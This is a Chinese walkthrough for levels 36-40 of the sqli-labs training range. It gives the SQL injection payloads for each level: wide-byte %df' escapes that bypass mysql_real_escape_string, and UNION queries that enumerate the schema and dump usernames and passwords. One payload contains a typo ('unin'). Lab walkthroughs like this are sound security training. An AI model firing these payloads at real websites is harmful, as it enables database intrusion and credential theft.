sqli-labs靶场通关攻略（36-40关）

第36关（宽字节注入（Bypass MySQL Real Escape String））

查数据库

?id=-1%df%27%20union%20select%202,database(),3%20--+

查表

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1%df' union select 1,group_concat(username,password),3 from users --+

第37关（post宽字节注入（MySQL_real_escape_string））

我们这关要用到抓包工具进行抓包，因为这关是post注入嘛

登录的时候进行抓包

查库

%df' union select 1,database() --+

查表

%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() --+

查列

%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

%df' union select 1,group_concat(username,password)from users--+

第38关(联合查询/也可堆叠注入)

查库

?id=-1' union select 1,database(),3 --+

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema= database() and table_name=0x7573657273 --+

查数据

?id=-1' union select 1,group_concat(username,password),3 from users --+

第39关（联合查询）

查数据库

?id=-1 unin select 1,database(),3 --+

查表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

?id=-1 union select 1,group_concat(username,password),3 from users --+

第40关（ ') 闭合）

查数据库

?id=-1') union select 1,database(),3 --+

查表

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1') union select 1,group_concat(username,password),3 from users --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/410498.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

sqli-labs靶场通关攻略（36-40关）

第36关（宽字节注入（Bypass MySQL Real Escape String））

查数据库

查表

查列

查数据

第37关（post宽字节注入（MySQL_real_escape_string） ）

查库

查表

查列

查数据

第38关(联合查询/也可堆叠注入)

查库

查表

查列

查数据

第39关（联合查询）

查数据库

查表

查列

查数据

第40关（ ') 闭合）

查数据库

查表

查列

查数据

相关文章

第37关（post宽字节注入（MySQL_real_escape_string））